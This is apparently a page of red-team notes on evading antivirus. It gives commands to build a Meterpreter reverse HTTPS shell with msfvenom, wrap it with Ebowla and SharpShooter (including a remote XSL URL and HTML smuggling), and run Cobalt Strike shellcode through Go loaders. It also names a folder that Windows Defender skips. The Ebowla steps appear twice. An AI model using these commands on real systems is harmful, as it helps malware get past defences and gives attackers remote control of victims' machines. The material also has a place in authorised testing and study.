malware_av_evasion

MALWARE AV EVASION

Ebowla Malware - https://github.com/Genetic-Malware/Ebowla

in genetic.config file Select "output_type" it'll be either GO, Python, or Powershell Select "payload_type" such as EXE, etc Select "clean_output" as false to start with, select true once you know the payload is successful

Select "Time_range" as a value when you are ready to start your engagement

Create payload msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=10.10.10.10 LPORT=8443 > shell.exe

or whatever payload you want

generate payload

./ebowla.py shell.exe genetic.config

build payload ./build_x86_go.sh output/go_symmetric_shell.exe.go shell.exe Ebowla Malware in genetic.config file Select "output_type" it'll be either GO, Python, or Powershell Select "payload_type" such as EXE, etc Select "clean_output" as false to start with, select true once you know the payload is successful

Select "Time_range" as a value when you are ready to start your engagement

Create payload msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=10.10.10.10 LPORT=8443 > shell.exe

or whatever payload you want

generate payload

./ebowla.py shell.exe genetic.config

build payload ./build_x86_go.sh output/go_symmetric_shell.exe.go shell.exe

Windows Defender

C:\AD\Tools <---This directory is exempt against Windows Defender. ​

https://github.com/Mr-Un1k0d3r/ThunderShell

https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178 https://github.com/mdsecactivebreach/SharpShooter

python SharpShooter.py --stageless --dotnetver 2 --payload hta --output malware --rawscfile /root/Desktop/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.0.16:8080/malware.xsl

Execute shellcode in golang

https://github.com/brimstone/go-shellcode https://github.com/vyrus001/shellGo

For https://github.com/vyrus001/shellGo

  1. Copy the main.go file from https://raw.githubusercontent.com/vyrus001/shellGo/master/main.go

  2. Generate a raw payload from cobalt strike, e.g., Attacks -> Packages -> Windows Executable (S)

Previousgithub_reposNextmalware_av_evasion--main.go

Last updated

Was this helpful?